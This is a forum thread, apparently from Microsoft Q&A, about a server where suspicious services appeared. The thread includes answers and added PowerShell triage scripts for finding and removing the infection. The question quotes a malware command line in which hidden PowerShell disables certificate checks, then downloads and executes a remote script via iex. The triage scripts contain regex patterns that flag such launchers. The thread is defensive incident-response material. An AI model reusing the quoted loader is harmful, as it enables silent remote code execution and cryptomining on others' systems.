Some weird services found in services.msc on one of our servers

Sadanand Joshi 20 Reputation points
2024-10-15T12:09:26.63+00:00

Hi,

S1 Screenshots - SEQGDCVMC179.pdf,

Some weird services were found in services.msc on one of our servers. It is showing:

The path of the executable mentioned is:

 C:\Windows\system32\cmd.exe /C "cmd /c powershell.exe -NoP -NonI -W Hidden "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains('64')){iex(New-Object Net.WebClient).DownloadString('/in6.ps1');}else{iex(New-Object Net.WebClient).DownloadString('/in3.ps1');}""

Can we suspect this is malware, and if so, how do we get rid of it? We have EDR software installed, but nothing is detected by it. The server was installed only 2 months ago, and these types of services appeared suddenly.

Thanks in advance,

Sadanand.

Windows for business | Windows Server | User experience | PowerShell
Windows for business | Windows Server | User experience | Other

Accepted answer
  1. MotoX80 36,401 Reputation points
    2024-10-15T18:47:37.6933333+00:00

    Sure looks like Malware. Cmd.exe cannot function as a true service as it does not have the needed entry points. And the script is loading a web address from file, downloading something (more powershell commands) and executing them.

    I would start by alerting your manager and your security team that you have encountered some suspicious activity.

    I did a search on in6.ps1 and in3.ps1 and came across these. (This site may not like these links, change xx to tt.)

    hxxps://asec.ahnlab.com/en/16564/

    hxxps://www.cybereason.com/blog/research/wannamine-cryptominer-eternalblue-wannacry

    Your security team may want to do an analysis of what that code did (or might do). You should try to figure out if the infection has spread or if any of your data was stolen/compromised. That would require you to download the actual malware payload and evaluate the code.

    Also note the "2. Registering WMI Event Filter" in the first link. The malware may have hidden itself within WMI. Check other machines on your network to see if they also have those odd service names.

    Start by opening a Powershell window with "run as administrator" and search for those files. They are probably in System32, but you want to scan the entire drive to see if they are anywhere else.

    Get-ChildItem -Path c:\ -force -include in6.ps1,in3.ps1 -recurse -ea SilentlyContinue | ft -Property CreationTime, LastWriteTime, FullName
    

    That might give you a date and time as to when your server was initially infected. You might be able to trace that back to someone or to some event that occurred. You will want to try and figure out how those files and services got there. And what admin might have initiated the infection.

    To clean your server, start with Microsoft's Malicious Software Removal Tool.

    mrt.exe /f
    

    If it doesn't report that it found anything, then next run a Defender (or 3rd party AV) full scan. If they don't detect the malware, then I would suggest installing Malwarebytes and try running its scan.

    You can use sc.exe to delete those services.

    sc.exe delete TheWeirdServiceName
    

    And make sure you fully update all machines with Windows Update.
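The checks in the accepted answer (suspicious service binary paths, WMI event subscriptions, the dropped in6.ps1/in3.ps1 files, and removal with sc.exe) can be collected into one elevated-PowerShell triage script. The script below is an added example and is not code from the answer above; the function names and the regular expression it uses to flag launcher command lines are assumptions modelled on the command quoted in the question.

```powershell
# Added triage example (not from the original thread). Run from an elevated
# PowerShell window. Function names and the pattern below are assumptions.

# Pattern typical of download-and-execute launchers: hidden, non-interactive
# PowerShell that fetches a remote script and hands it to iex. Built from the
# command line quoted in the question.
$suspiciousPattern = 'powershell.*(-NoP|-W\s+Hidden|-NonI).*(DownloadString|iex|Invoke-Expression)'

# 1. Services whose binary path is a cmd.exe wrapper or matches the pattern.
#    Win32_Service.PathName is the ImagePath the Service Control Manager launches.
function Get-SuspiciousService {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -match $suspiciousPattern -or
            $_.PathName -match '\\cmd\.exe\s+/c'
        } |
        Select-Object Name, DisplayName, State, StartMode, StartName, PathName
}

# 2. WMI permanent event subscriptions (filter, consumer, binding): the
#    persistence the AhnLab write-up calls "Registering WMI Event Filter".
#    Any entry here that an admin did not create deserves a close look.
function Get-WmiPersistence {
    $ns = 'root\subscription'
    [pscustomobject]@{
        Filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter |
                        Select-Object Name, Query
        Consumers = @(
                        Get-CimInstance -Namespace $ns -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue
                        Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -ErrorAction SilentlyContinue
                    ) | Select-Object Name, CommandLineTemplate, ScriptText
        Bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
                        Select-Object Filter, Consumer
    }
}

# 3. Locate the dropped scripts anywhere on the system drive and report their
#    timestamps, which gives a first estimate of when the host was compromised.
function Find-DroppedScript {
    param(
        [string[]]$Name = @('in6.ps1', 'in3.ps1'),
        [string]$Root = ($env:SystemDrive + '\')
    )
    Get-ChildItem -Path $Root -Include $Name -Recurse -Force -ErrorAction SilentlyContinue |
        Select-Object CreationTime, LastWriteTime, Length, FullName
}

# 4. Remove a service you have confirmed as malicious: stop it first so the
#    SCM is not holding it, then delete it. Only call this after review.
function Remove-MaliciousService {
    param([Parameter(Mandatory)][string]$Name)
    Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue
    & sc.exe delete $Name
}

# Usage: review everything before deleting anything.
Get-SuspiciousService | Format-List
Get-WmiPersistence    | Format-List
Find-DroppedScript    | Format-Table -AutoSize
# Remove-MaliciousService -Name 'TheWeirdServiceName'   # after review
```

Run the same script on the other machines on the network, as the answer suggests, and compare the output: a service name, WMI filter, or file that shows up on more than one host is a sign the infection has spread.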


1 additional answer

  1. Rich Matheisen 47,901 Reputation points
    2024-10-15T19:08:45.9733333+00:00

    The names of the services alone would make me suspicious!
    The file "in6.ps1" has been identified as a potential problem. The file "in3.ps1" can also be found, but less often since it's only used if the machine is running 32-bit software.

    The code is probably just dropping a file on some scheduled basis. But the file probably contains information instructing the service(s) to do something.

    Here's an example:

    https://any.run/report/61b5934940e218f942aaef0c7efdad99b4a210a1d9c3ccc01b276cdee04c5aa3/044cb3b4-6d70-49b2-942c-3c5b796ff8df

    Check for any files that are run during system start-up, either as scheduled tasks or via the run/runonce registry keys.

    You should engage your AV vendor for help in removing all of this malware.
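To check the start-up locations this answer points at (scheduled tasks and the Run/RunOnce registry keys), the following elevated-PowerShell script enumerates both and flags entries that launch hidden PowerShell or fetch remote content. It is an added example, not code from the answer; the function names and the matching pattern are assumptions derived from the command line in the question.

```powershell
# Added example (not from the original answer). Run elevated. Function names
# and the pattern are assumptions based on the command quoted in the question.
$suspiciousPattern = 'powershell.*(-NoP|-W\s+Hidden|-NonI|DownloadString|iex|Invoke-Expression|FromBase64String)'

# Scheduled tasks: each action's Execute/Arguments pair is what actually runs.
function Get-SuspiciousScheduledTask {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match $suspiciousPattern -or $action.Execute -match '\\cmd\.exe$') {
                [pscustomobject]@{
                    TaskPath = $task.TaskPath
                    TaskName = $task.TaskName
                    State    = $task.State
                    Author   = $task.Author
                    Command  = $cmd
                }
            }
        }
    }
}

# Run / RunOnce keys for the machine and for every loaded user profile hive.
function Get-SuspiciousRunKey {
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # HKU: is not mapped by default; map it so loaded user hives can be read.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $hives = Get-ChildItem -Path HKU:\ -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -notmatch '_Classes$' }
    foreach ($hive in $hives) {
        $keys += "$($hive.PSPath)\Software\Microsoft\Windows\CurrentVersion\Run"
        $keys += "$($hive.PSPath)\Software\Microsoft\Windows\CurrentVersion\RunOnce"
    }
    foreach ($key in $keys) {
        $item = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        foreach ($prop in $item.PSObject.Properties) {
            if ($prop.Name -like 'PS*') { continue }   # skip provider metadata
            if ("$($prop.Value)" -match $suspiciousPattern) {
                [pscustomobject]@{ Key = $key; Name = $prop.Name; Command = $prop.Value }
            }
        }
    }
}

Get-SuspiciousScheduledTask | Format-List
Get-SuspiciousRunKey        | Format-List
```

Entries that match are candidates, not verdicts: confirm each one against the task's author, creation time, and the file it points at before removing it, and keep a copy of the output for the security team's timeline.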

